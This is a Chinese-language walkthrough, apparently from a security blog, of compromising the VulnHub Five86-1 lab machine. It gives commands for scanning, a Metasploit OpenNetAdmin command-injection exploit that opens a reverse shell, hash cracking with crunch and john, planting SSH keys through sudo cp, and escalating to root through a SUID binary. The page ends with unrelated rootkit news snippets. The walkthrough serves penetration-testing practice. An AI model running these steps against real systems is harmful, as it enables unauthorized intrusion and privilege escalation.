<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之Five86-1的實踐

    VSole2023-10-16 09:27:53

    今天實踐的是vulnhub的Five86-1鏡像,

    下載地址,https://download.vulnhub.com/five86/Five86-1.zip,

    用virtualbox導入成功,

    做地址掃描,sudo netdiscover -r 192.168.0.0/24,

    獲取到靶機地址192.168.0.117,

    繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.117,

    獲取到80端口有web服務,且有/ona目錄,

    瀏覽器訪問http://192.168.0.117/ona,

    獲取到openNetAdmin的版本v18.1.1,

    在msf里搜索可利用的漏洞,msfconsole,search openNetAdmin,

    use exploit/unix/webapp/opennetadmin_ping_cmd_injection,

    查看使用方法,show options,

    配置遠程主機和本地主機地址即可,

    set RHOSTS 192.168.0.117

    set LHOST 192.168.0.192

    exploit

    獲取到msf shell,getuid確認不是root,

    轉成普通shell,shell,

    python -c 'import pty;pty.spawn("/bin/bash")',

    進入web路徑,查看到用戶名密碼,密碼是hash的,

    douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1,

    并獲取到密碼的算法提示,

    制作密碼字典,crunch 10 10 aefhrt > dict.txt,

    把密碼hash保存到文件,vim hash,

    破解密碼,john --wordlist=/home/kali/dict.txt hash,

    獲取到用戶名密碼,douglas/fatherrrrr,

    切換賬號,su douglas,id確認不是root,

    sudo -l查看可以用jen權限執行/bin/cp,

    把douglas的公鑰拷貝到jen下,

    cat id_rsa.pub > /tmp/authorized_keys,cd /tmp,

    chmod 777 authorized_keys,

    sudo -u jen /bin/cp authorized_keys /home/jen/.ssh,

    使用douglas的私鑰做ssh登錄,

    cp /home/douglas/.ssh/id_rsa ./,chmod 600 id_rsa,

    ssh -i id_rsa jen@127.0.0.1,提示了mail信息,id確認不是root,

    進入mail目錄進行查看,cd /var/mail,cat jen,

    獲取到用戶名密碼,moss/Fire!Fire!,

    切換賬號,su moss,id確認不是root,

    查找root權限的程序,find / -perm -u=s -type f 2>/dev/null,

    獲取到/home/moss/.games/upyourgame,

    執行upyourgame,一路回答問題,獲取到新的shell,id確認是root,

    root
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    近期,火絨威脅情報系統監測到一種Rootkit病毒正通過“天龍八部”游戲私服進行傳播。該病毒通過劫持用戶訪問的網頁來推廣自己的私服網站,并且具有廣告推廣功能。此外,其還采用多種對抗手段來對抗殺毒軟件查殺,對用戶構成較大威脅。目前,火絨安全產品可對上述病毒進行攔截查殺,請用戶及時更新病毒庫以進行防御。
    Rootkit 是植入操作系統最深處的c。盡管在紙面上它們似乎對攻擊者很有吸引力,但創建它們會帶來重大的技術挑戰,并且最輕微的編程錯誤都有可能使受害計算機完全崩潰。
    此執行鏈的目標是在每次啟動時從受感染的UEFI組件開始將內核級植入部署到Windows系統中。研究人員指出,這一特定活動似乎高度針對中國的特定個人,在伊朗和越南也出現了一些案例。
    Rootkit」即「root kit」,直譯為中文便是「根權限工具包」的意思,在今天的語境下更多指的是一種被作為驅動程序、加載到操作系統內核中的惡意軟件。
    一個可能的中國 rootkit 會感染目標計算機并在重新安裝系統時保持活動狀態
    執行下列系統命令移除 pkexec 的 suid位:chmod 0755 /usr/bin/pkexec. yum clean all && yum makecacheyum update polkit -y
    據 securityaffairs 12月30日消息,某個首次發現的 rootkit 病毒(也稱為 iLOBleed)正針對惠普企業服務器展開攻擊,能夠從遠程感染設施并擦除數據。 集成燈控(iLO)是惠普旗下的嵌入式服務器管理技術,該模塊可以完全訪問服務器上安裝的所有固件、硬件、軟件和操作系統。
    近日研究人員首次發現 rootkit 病毒(也稱為 iLOBleed)正針對惠普企業服務器展開攻擊,能夠從遠程感染設施并擦除數據。此次攻擊由伊朗網絡安全公司 Amnpardaz 發現,iLOBleed 是有史以來首次針對 iLO 固件的惡意軟件。 專家解釋說,針對 iLO 的惡意軟件非常難以防控,因為它以高權限運行(高于操作系統中的任何訪問級別),可以做到不被管理員和檢測軟件察覺。通過篡改此模塊
    安全公司 Bitdefender 的研究人員發現,一種流量重定向 Rootkit 惡意程序以某種方式通過了驅動程序認證程序, 獲得了微軟簽發的數字簽名證書。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类